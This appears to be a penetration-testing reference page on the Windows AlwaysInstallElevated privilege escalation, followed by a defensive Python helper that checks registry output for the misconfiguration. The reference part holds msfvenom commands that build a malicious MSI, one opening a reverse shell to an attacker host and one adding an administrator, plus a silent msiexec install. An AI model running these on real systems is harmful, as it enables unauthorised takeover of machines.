AlwaysInstallElevated
MITRE ATT&CK™ System Binary Proxy Execution: Msiexec - Technique T1218.007
Theory
Practice
reg.py domain.local/username:password123@<TARGET_IP> query -keyName "HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer" -v AlwaysInstallElevated
reg.py domain.local/username:password123@<TARGET_IP> query -keyName "HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer" -v AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

. .\PowerUp.ps1
Invoke-AllChecks

winPEASx64.exe systeminfo

# Reverse Shell
v4resk㉿kali$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKING_IP> LPORT=<ATTACKING_PORT> -f msi > package.msi
# Add user to Administrators
v4resk㉿kali$ msfvenom -p windows/exec CMD='net localgroup administrators <YOUR_USER> /add' -f msi > package.msi

msiexec.exe /quiet /qn /i package.msi
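The two registry queries under Practice have to be read together: Windows Installer only elevates packages when AlwaysInstallElevated is 1 in both the HKLM and the HKCU policy key. The audit helper below is an added example, not part of the original page; it parses saved output of those queries (from `reg query` or reg.py) and reports the exposure. The function names, verdict labels and sample outputs are constructed for illustration.

```python
import re

# Value line as printed by `reg query ... /v AlwaysInstallElevated` (reg.py uses tabs).
VALUE_RE = re.compile(
    r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+(0x[0-9a-fA-F]+)\s*$", re.M)

# Constructed sample outputs, not captured from a real host.
SAMPLE_HKLM_SET = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
SAMPLE_HKCU_SET = r"""
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
SAMPLE_HKCU_ZERO = SAMPLE_HKCU_SET.replace("0x1", "0x0")
SAMPLE_MISSING = "ERROR: The system was unable to find the specified registry key or value."


def policy_value(reg_output):
    """Return the DWORD from one query's output, or None if the value is absent."""
    m = VALUE_RE.search(reg_output)
    return int(m.group(1), 16) if m else None


def assess(hklm_output, hkcu_output):
    """Combine both hives: the policy is effective only when both are 1."""
    hklm, hkcu = policy_value(hklm_output), policy_value(hkcu_output)
    if hklm == 1 and hkcu == 1:
        verdict = "EXPOSED"   # any user can install an MSI with elevated rights
        advice = "Set AlwaysInstallElevated to 0 or remove it in both hives (check GPO)."
    elif hklm == 1 or hkcu == 1:
        verdict = "PARTIAL"   # not effective yet, one setting away from exposure
        advice = "Remove the remaining value and find the policy that set it."
    else:
        verdict = "OK"
        advice = "No action needed."
    return {"hklm": hklm, "hkcu": hkcu, "verdict": verdict, "advice": advice}


if __name__ == "__main__":
    for label, hkcu in [("both set", SAMPLE_HKCU_SET),
                        ("HKCU zero", SAMPLE_HKCU_ZERO),
                        ("HKCU missing", SAMPLE_MISSING)]:
        result = assess(SAMPLE_HKLM_SET, hkcu)
        print(f"{label}: {result['verdict']} - {result['advice']}")
```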
